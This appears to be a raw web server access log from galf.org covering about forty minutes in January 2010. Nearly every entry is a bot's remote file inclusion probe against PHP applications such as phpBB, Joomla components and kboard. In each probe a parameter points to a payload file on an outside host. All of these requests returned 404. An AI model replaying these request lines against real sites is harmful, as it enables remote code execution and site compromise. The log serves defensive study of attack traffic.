74.200.89.25 - - [10/Jan/2010:23:16:32 -0800] "GET /logs//admin/admin_users.php?phpbb_root_path=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.122.26.58 - - [10/Jan/2010:23:17:15 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.26.58 - - [10/Jan/2010:23:17:15 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.26.58 - - [10/Jan/2010:23:17:15 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.26.58 - - [10/Jan/2010:23:17:15 -0800] "GET /logs/access_100104.log//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:23:18:16 -0800] "GET /logs/access_091130.log//index.php?get=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:23:18:16 -0800] "GET /logs//index.php?get=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:23:18:16 -0800] "GET /index.php?get=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:23:18:29 -0800] "GET /logs/access_091130.log//index.php?get=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:23:18:29 -0800] "GET /index.php?get=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:23:18:29 -0800] "GET /logs//index.php?get=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [10/Jan/2010:23:19:16 -0800] "GET /logs/access_090921.log%20%20///?sourcedir=http://ipod69.webng.com/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [10/Jan/2010:23:19:35 -0800] "GET /logs/access_090907.log%20%20///?sourcedir=http://ipod69.webng.com/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:21:55 -0800] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:21:55 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:21:55 -0800] "GET /appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:21:55 -0800] "GET /appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:21:55 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:21:55 -0800] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:21:58 -0800] "GET /appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:21:58 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:21:58 -0800] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:22:07 -0800] "GET /appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:22:07 -0800] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:22:07 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:23:45 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:23:45 -0800] "GET /logs/access_090803.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:23:45 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:23:49 -0800] "GET /logs/access_090803.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:23:49 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:23:49 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:23:51 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:23:51 -0800] "GET /logs/access_090803.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:23:51 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:23:51 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:23:51 -0800] "GET /logs/access_090803.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:23:51 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:23:55 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:23:55 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:24:04 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:24:07 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:24:28 -0800] "GET /logs/access_091102.log%20%20//appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:24:30 -0800] "GET /logs/access_091102.log%20%20//appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:24:48 -0800] "GET /logs/access_091102.log%20%20//appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:24:50 -0800] "GET /logs/access_091102.log%20%20//appserv/main.php?appserv_root=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.46.199.198 - - [10/Jan/2010:23:29:12 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
219.94.198.80 - - [10/Jan/2010:23:29:49 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [10/Jan/2010:23:29:49 -0800] "GET /logs/access_090907.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [10/Jan/2010:23:29:49 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [10/Jan/2010:23:29:49 -0800] "GET /logs/access_090824.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [10/Jan/2010:23:30:46 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [10/Jan/2010:23:30:47 -0800] "GET /logs/access_090907.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [10/Jan/2010:23:30:47 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [10/Jan/2010:23:30:53 -0800] "GET /logs/access_090824.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [10/Jan/2010:23:31:32 -0800] "GET /logs/access_090914.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [10/Jan/2010:23:31:32 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [10/Jan/2010:23:31:32 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [10/Jan/2010:23:32:04 -0800] "GET /logs/access_090914.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [10/Jan/2010:23:32:04 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.198.80 - - [10/Jan/2010:23:32:04 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.avto-x.ru//photos/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:34:39 -0800] "GET /logs/access_090921.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:36:17 -0800] "GET /logs/access_090921.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:36:59 -0800] "GET /logs/access_090921.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:23:37:25 -0800] "GET /logs/access_090803.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:23:37:25 -0800] "GET /main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:23:37:25 -0800] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.10.89 - - [10/Jan/2010:23:37:55 -0800] "GET /logs/access_090921.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:23:37:56 -0800] "GET /logs/access_090831.log//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:23:37:56 -0800] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:23:37:56 -0800] "GET /main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:23:38:02 -0800] "GET /logs/access_090803.log//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:23:40:19 -0800] "GET /logs/access_090629.log//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:23:43:57 -0800] "GET /logs/access_090921.log//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:48:19 -0800] "GET /skin/zero_vote/setup.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:48:19 -0800] "GET /logs/access.log%20%20/skin/zero_vote/setup.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:48:19 -0800] "GET /logs/skin/zero_vote/setup.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:48:50 -0800] "GET /skin/zero_vote/setup.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:48:50 -0800] "GET /logs/skin/zero_vote/setup.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:48:51 -0800] "GET /logs/access.log%20%20/skin/zero_vote/setup.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:49:25 -0800] "GET /logs///skin/zero_vote/ask_password.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:49:25 -0800] "GET /logs/access.log%20%20///skin/zero_vote/ask_password.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:49:25 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:49:35 -0800] "GET /logs///skin/zero_vote/ask_password.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:49:37 -0800] "GET /logs/access.log%20%20///skin/zero_vote/ask_password.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:49:37 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [10/Jan/2010:23:51:09 -0800] "GET /logs/index.php?sayfa=http://109.cypanel.com/_vti_txt/id1.php? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
74.55.15.194 - - [10/Jan/2010:23:51:09 -0800] "GET /index.php?sayfa=http://109.cypanel.com/_vti_txt/id1.php? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
74.55.15.194 - - [10/Jan/2010:23:51:09 -0800] "GET /logs/access_090831.log/index.php?sayfa=http://109.cypanel.com/_vti_txt/id1.php? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:52:33 -0800] "GET /logs/access_100104.log%20%20/skin/zero_vote/setup.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [10/Jan/2010:23:52:35 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [10/Jan/2010:23:52:35 -0800] "GET /logs/access_090727.log%20%20/akocomments.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [10/Jan/2010:23:52:35 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:52:38 -0800] "GET /logs/access_100104.log%20%20/skin/zero_vote/setup.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [10/Jan/2010:23:53:10 -0800] "GET /logs/access_090629.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [10/Jan/2010:23:53:13 -0800] "GET /%22show_news.php?%22/include&autoLoadConfig[999][0][loadFile]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [10/Jan/2010:23:53:19 -0800] "GET /logs/%22show_news.php?%22/include&autoLoadConfig[999][0][loadFile]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [10/Jan/2010:23:53:19 -0800] "GET /logs/access.log/%22show_news.php?%22/include&autoLoadConfig[999][0][loadFile]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [10/Jan/2010:23:53:24 -0800] "GET /logs/access_090803.log/index.php?sayfa=http://109.cypanel.com/_vti_txt/id1.php? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
66.230.225.218 - - [10/Jan/2010:23:53:29 -0800] "GET /modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.230.225.218 - - [10/Jan/2010:23:53:29 -0800] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.230.225.218 - - [10/Jan/2010:23:53:29 -0800] "GET /logs/access_091221.log//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:54:16 -0800] "GET /logs/access_100104.log%20%20///skin/zero_vote/ask_password.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:54:18 -0800] "GET /logs/access_100104.log%20%20///skin/zero_vote/ask_password.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [10/Jan/2010:23:55:50 -0800] "GET /%22show_news.php?%22/include&autoLoadConfig[999][0][loadFile]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [10/Jan/2010:23:55:50 -0800] "GET /logs/%22show_news.php?%22/include&autoLoadConfig[999][0][loadFile]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [10/Jan/2010:23:55:50 -0800] "GET /logs/access.log/%22show_news.php?%22/include&autoLoadConfig[999][0][loadFile]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:23:56:45 -0800] "GET /include/lib.inc.php?site_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
207.191.225.96 - - [10/Jan/2010:23:56:45 -0800] "GET /logs//include/lib.inc.php?site_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
207.191.225.96 - - [10/Jan/2010:23:56:48 -0800] "GET /logs/access.log//include/lib.inc.php?site_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [10/Jan/2010:23:58:19 -0800] "GET /logs/access_090629.log//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:58:35 -0800] "GET /logs/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:58:36 -0800] "GET /logs/access_091228.log/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:58:37 -0800] "GET /index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:58:37 -0800] "GET /logs/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:58:37 -0800] "GET /logs/access_091228.log/index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:23:58:37 -0800] "GET /index.php?meio.php=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [10/Jan/2010:23:58:44 -0800] "GET /logs/access_090727.log/akocomments.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
